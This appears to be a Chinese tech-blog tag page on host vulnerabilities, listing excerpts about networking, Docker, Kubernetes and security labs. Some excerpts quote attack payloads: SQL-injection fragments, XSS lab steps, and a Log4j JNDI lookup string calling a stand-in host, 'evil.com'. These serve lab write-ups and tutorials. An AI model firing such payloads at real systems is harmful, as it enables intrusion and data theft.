主机漏洞

服务器硬件、部署LNMP动态网站、部署wordpress、配置web与数据库服务分离、配置额外的web服务器

项目实战目标单机安装基于LNMP结构的WordPress网站基本环境准备配置nginx配置数据库服务部署wordpressweb与数据库服务分离准备数据库服务器迁移数据库配置额外的web服务器day01项目实战目标主机
Mick方·2024-02-20 09:33

【计算机网络】网络编程套接字&UDP服务器客户端的简单模拟

uint32_tntohl(uint32_tnetlong);uint16_tntohs(uint16_tnetshort);实际上这些函数名是很好记的,按照作用来组合即可,其中h表示host,是当前主机的意
凌云志.·2024-02-20 09:02

详解MySQL高可用方案--MySQL MHA架构、原理、应用场景等

概述MySQL高可用,顾名思义就是当MySQL主机或服务发生任何故障时能够立马有其他主机顶替其工作,并且最低要求是要保证数据一致性。
君子愁·2024-02-20 09:42

负载均衡下webshell连接nginx解析漏洞、sql注入第一关

首先搭建环境找到php较低的版本改一下账号密码输入?id=1正常输入?id=1'报错'.0'输入?id=1'--+正常判断是字符型注入,闭合方式是'id是1后台看是数据表里第一行查询id=1'出错前端打印出了报错信息语法错误这里是找到了库名,接下来是找表名这个方法是子里面把两个表连接在一起查询出的数据,当做一张表来进行查询,join是连接的意思,复查询去查询?id=1'and1=2unionsel
kaituozhizzz·2024-02-20 09:49

借助 JFrog Artifactory 中的“发布生命周期管理”实现“发布优先”的能力

研发规模较小的企业可能会在软件发布之前进行少量的自动化测试,而研发规模较大的企业可能会进行数百项漏洞扫描、验证和审查,涵盖从技术到法律的方方面面。
晓数·2024-02-20 09:17

Docker网络和数据管理:提升你的Python爬虫

host:移除了网络隔离,容器会直接使用宿主机
web安全工具库·2024-02-20 09:57

Postgresql 怎么实现在局域网中访问

安装PostgreSQL后,默认情况下只能在本机进行连接访问,如果需要在其他主机上访问PostgreSQL数据库服务器,需要进行配置。
业余敲代码·2024-02-20 08:51

Docker 搭建 mysql8 遇到的问题

1拉去mysql的镜像[root@lianhe~]#dockerpullmysql2创建mysql和宿主机共享的文件2.1创建共享数据库目录[root@lianhe~]#mkdir-p/opt/mysql
嘻哈记·2024-02-20 08:15

Java之网络编程

实现资源共享与信息传递的计算机系统网络通讯的两个要素通讯双方的网络地址1.ip2.端口号通过ip+端口号就可以精准定位一台计算机规则:网络通讯协议TCP/IP参考模型1.网络编程中有两个主要的问题一、如何精准定位到网络上的一台或多台主机
yrpyy·2024-02-20 08:08

使用kubeadm快速部署一个k8s集群

v25.0.3kubernetes版本:v1.25.01安装准备部署k8s集群的节点按照用途可以分为如下2类角色master:集群的master节点,集群的初始化节点slave:集群的slave节点,可以是多台主机各个节点部署的相关服务
嘻哈记·2024-02-20 08:38

【安全狐】route print命令详解

大多数主机一般都是驻留在只连接一台路由器的网段上。由于只有一台路由器,因此不存在使用哪一台路由器将数据包发表到远程计算机上去的问题,该路由器的IP地址可作为该网段上所有计算机的缺省网关来输入。
安全狐·2024-02-20 08:32

Linux指令学习

购买腾讯云服务器学生购买地址:学生云服务器_学生云主机_学生云数据库_云+校园特惠套餐-腾讯云腾讯云开年·上云有礼_腾讯云优惠活动安装xshell连接云服务器常用linux命令目录切换cdcd/进入系统根目录
青城小虫·2024-02-20 08:59

w25 web漏洞之xss

pikachu靶场第一关-反射型xss(get)利用hpp漏洞破解第二关-反射型xss(post)登录:admin/123456修改postdata内的参数第三关-存储型xss在留言板输入message
杭城我最帅·2024-02-20 08:46

Zookeeper未授权访问漏洞

Zookeeper漏洞介绍Zookeeper支持某些特定的四字查询命令,可以未授权访问,从而泄露zookeeper服务的相关信息,这些信息可能作为进一步入侵其他系统和服务的跳板,利用这些信息实现权限提升并逐渐扩大攻击范围
杭城我最帅·2024-02-20 08:36

k8s来一波

_x64(mini)Docker23-ceKubernetes1.23服务器:master192.168.106.140node1192.168.106.141node2192.168.106.142主机名解析
高粱·2024-02-20 08:01

VMware 主机ping不通虚拟机的解决方法

VMware主机ping不通虚拟机的解决方法一、查看虚拟机的IP地址、网关等二、修改网络适配器配置一般来说到了这一步虚拟机就可以ping通主机了但是我按照网上的教程走到这一步之后,发现并没有ping通主机我把虚拟机的网卡禁用之后重新启用
是阿洋啊·2024-02-20 08:28

docker 使用运行指令讲解

OPTIONS]IMAGE[COMMAND][ARG...]option作用-i以交互模式运行容器,通常与-t同时使用-t启动容器后,为容器分配一个命令行,通常与-i同时使用-v目录映射,容器目录挂载到宿主机目录
林大大哟·2024-02-20 07:56

AcuAutomate:一款基于Acunetix的大规模自动化渗透测试与漏洞扫描工具

关于AcuAutomateAcuAutomate是一款基于Acunetix的大规模自动化渗透测试与漏洞扫描工具,该工具旨在辅助研究人员执行大规模的渗透测试任务。
FreeBuf_·2024-02-20 07:50

Docker基础知识

核心概念docker主机(Host):安装了Docker程序的机器(Docker直接安装在操作系统之上);docker客户端(Client):连接docker主机进行操作;
笨笨哒2018·2024-02-20 07:30

安全基础~通用漏洞5

文章目录知识补充CSRFSSRFxss与csrf结合创建管理员账号知识补充NAT:网络地址转换,可以将IP数据报文头中的IP地址转换为另一个IP地址,并通过转换端口号达到地址重用的目的。即通过将一个外部IP地址和端口映射更大的内部IP地址集来转换IP地址。端口映射:在数据传输结束后,会将端口释放掉,若进行了端口映射,那么公网数据包只要是该映射端口,就会固定发送到对应的私有ip功能:NAT不仅能解决
`流年づ·2024-02-20 07:15

XXE知识总结,有这篇就够了!

例如PHP中的simplexml_load默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。而学习XXE要从认识X
是叶十三·2024-02-20 07:45

安全基础~通用漏洞6

文章目录知识补充XXE文件包含CTFshow闯关知识补充XML格式(一种数据传输格式,现在被JSON取代):https://xz.aliyun.com/t/6887XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素DTD定义合法的XML文档构建模块,它使用一系列合法的元素来定义文档的结构。DTD可被成行地声明于XML文档中,也可作为一个外部引用。参考文章XXEXML外部实体注入(也
`流年づ·2024-02-20 07:13

主机安全加固之-openssh版本升级

升级openssh之前,为了保证能正常通过工具连接主机,咱们开启telnet服务,通过telnet的方式登录主机一:开启telnet服务1.安装telnet服务[root@localhost~]#yuminstall–ytelnettelnet-serverxinetd2
捞一碗月光-zq·2024-02-20 07:06

k8s容器以及基础设施优化

1.硬件系统选型:宿主机通用配置16c/32GB/4网卡队列2.os优化:单机支持百万tcp并发,/etc/sysctl.conf,/etc/security/limits.conf3.k8s&容器层优化
mask哥·2024-02-20 07:34

Docker镜像服务注册到Nacos注册地址为内网IP的解决办法

spring:cloud:inetutils:ignored-interfaces:docker0nacos:discovery:ip:${服务所在宿主机的IP}port:${服务的port,便于nacos
莫夏_b560·2024-02-20 07:55

OpenStack手动迁移虚拟机

1.规划节点IP主机名节点192.168.100.10controllerOpenStack控制节点192.168.100.20computeOpenStack计算节点2.基础准备使用OpenStack
曹博Blog·2024-02-20 07:59

怎样一次性清除ensp中的所有配置以及处理电脑主机不可达

目录问题:1.如何一次性清楚ensp中的所有配置(交换机)配置如下注意:一定得重新启动2.电脑主机不可达问题:如何一次性清楚ensp中的所有配置(交换机)配置如下注意:一定得重新启动2.电脑主机不可达可能原因
不变的梦·2024-02-20 07:20

网络攻防技术(2021期末考试)

2、什么是漏洞漏洞有哪些特性?3、什么是Cookie?Cookie有哪些应用?画图说明跨站脚本攻击的攻击原理?二、判断题(30分)(正确(T)错误(F)每小题3分)1、计算机安全就是网络安全。
星楼如初·2024-02-20 07:42

网络攻击与防范名词解释

1.0Day是指在系统商在知晓并发布相关补丁前就被掌握或者公开的漏洞信息。2.bof攻击是利用上参数的溢出将返回地址用自己构造的数据覆盖掉,从而控制程序的进程。
hutaoQ123·2024-02-20 07:07

threehit漏洞复现以及防御

说白了跟sql-liql靶场二次注入一样,也是一个转义函数而这次是,入库的时候不转义,出库的时候会转义导致这个漏洞出现开始测试:这是我注册完test刚登录的情况找注入点更新数据的update,很容易找到在
凌晨五点的星·2024-02-20 07:35

Linux系统启动jar包很慢解决方式

过了很久才开始打印启动日志解决方式:首先执行命令[root@ecs-gulqdsjgl-sjhzlyypt-0036servers]#hostnameecs-gulqdsjgl-sjhzlyypt-0036知道主机名称为
甘小涛哇·2024-02-20 06:49

mac+centos7 配置静态ip地址

ip地址变了,所以现在设置为静态ip1.打开vmwareFusion的偏好设置选择网络,点击左下角的解锁,输入锁屏密码,点击加号➕,然后只勾选允许该网络上的虚拟机连接到外部网络(使用net)和将mac主机连接到该网络
西洲2468·2024-02-20 06:48

漏洞复现】H3C 路由器多系列信息泄露漏洞

Nx02漏洞描述H3C路由器多系列存在信息泄露漏洞,攻击者可以利用该漏洞获取备份文件中的管理员账户及密码等敏感信息。
晚风不及你ღ·2024-02-20 06:18

vulhub中Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入
余生有个小酒馆·2024-02-20 06:39

vulhub中Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)

ApacheLog4j2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。1.我们使用ysoserial生成payload,然后直接发送给`your-ip:4712`端口即可。
余生有个小酒馆·2024-02-20 06:23

漏洞单是怎么找到的?漏洞单的产品怎么找?

网购如何寻找漏洞单?我不是来炫耀的,太低级,授人以鱼不如授人以渔。我在之前的文章中提到利用漏洞单增加收入,很多朋友问我,这个漏洞单,或者情报单、礼金单在哪里找?怎么在淘宝上买到漏洞单?
好项目高省·2024-02-20 06:14

产品推出在即,《宝可梦传说:阿尔宙斯》是一款怎样的游戏?

对于主机玩家(尤其是Switch玩家)来说,2022年伊始第一款重量级游戏《宝可梦传说:阿尔宙斯》就快正式推出了,具体日期是2022年1月28日。
爱游戏的萌博士·2024-02-20 06:11

基于springBoot的开源运维监控工具——WGCLOUD

WGCLOUD是一个高性能的分布式监控系统,server基于springboot架构开发,agent采用go开发,核心模块包括:主机监控,ES集群监控,CPU监控,CPU温度监控,大屏看板,docker
tianshiyeben·2024-02-20 05:09

面试浏览器框架八股文十问十答第一期

1)XSS(Cross-SiteScripting)攻击是一种常见的网络安全漏洞,攻击者通过在网页中插入恶意脚本来实现攻击,当用户访问包含恶意脚本的网页时,这些脚本就会在用户的浏览器中执行,从而导致用户信息泄露
程序员小白条·2024-02-20 04:43

C++如何向另一个网络里的主机发送数据包

在C++中,向另一个网络中的主机发送数据包通常涉及使用套接字(sockets)编程。套接字是计算机网络中的一种通信端点,它允许不同计算机上的程序相互通信。
行动之上·2024-02-20 04:23

VirtualBox 虚拟机和主机通信

1.桥接网卡2.仅主机网络管理-->主机网络管理器...-->添加一个虚拟网卡(手动配置网卡)配置如下网卡1仅主机网络网卡2:桥接网卡二、注意事项虚拟机需要关闭防火墙。
光脚丫的孩子·2024-02-20 04:40

【计算机网络】第六章·应用层

目录1.应用层概述1.1.客户/服务器方式和对等方式1.客户/服务器方式(C/S方式)2.对等方式(P2P方式)1.2.动态主机配置协议DHCP2.域名系统DNS2.1.DNS的作用2.2.层次树状结构的域名结构
hehelm·2024-02-20 04:48

Linux-防火墙

文章目录Linux-防火墙一.防火墙简述1.从进行分类2.从上进行分类3.从上进行分类4.堡垒主机二.firewalld1、启动:firewall防火墙服务2、了解:firewall的规则文件3、了解:
why0706y·2024-02-20 04:17

逻辑漏洞挖掘 | 对某某招商网的一次渗透

本文由掌控安全学院-高粱红投稿开局一个登录框:发现登陆点,逻辑漏洞的姿势不断在脑海反反复复,说干就干看到验证码,尝试绕过重复发包后,发现可以重复利用事情简单了起来,上字典,手机号爆破运气不错,跑出了多个账号整理一下拿到的账号
zkzq·2024-02-20 04:46

初始HTTP协议

习惯上,大家把连接在因特网上的计算机都成为主机
AH努力中·2024-02-20 04:15

Linux ----防火墙值SNAT与DNAT

一、SNAT①SNAT应用环境:局域网主机共享单个公网IP地址接入Internet(私有IP不能在Internet中正常路由)②SNAT原理:源地址转换,根据指定条件修改数据包的源IP地址,通常被叫做源映射数据包从内网发送到公网时
AH努力中·2024-02-20 04:45

渗透某巨型企业某个系统的奇葩姿势

文中重码,且漏洞已修复。
zkzq·2024-02-20 04:14

应用的集群部署

现在有些用F5之类的负载均衡器的应用也被叫做集群,还有双机热备(部分人也把它叫集群,其实只有一台机器在工作,另一台是备份机,平时不参与业务,只有主机不能提供服务的时候,备份机采工作)。
Godlikeme01·2024-02-20 03:42

【计算机网络】网络层之IP协议

文章目录1.基本概念2.协议头格式3.网段划分4.特殊的IP地址5.IP地址的数量限制6.私有IP地址和公网IP地址7.路由1.基本概念IP地址是定位主机的,具有一个将数据报从A主机跨网络可靠的送到B主机的能力
椿融雪·2024-02-20 03:07

利用.htaccess将二级域名与二级目录绑定

之前买了一个阿里云的虚拟主机,同时配了一个域名一直没用,现在准备用起来玩一下。本文主要介绍在同一一级域名、同一ip下如何实现二级域名的跳转。
前端唠唠嗑·2024-02-20 03:35
上一页 13 14 15 16 17 18 19 20 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他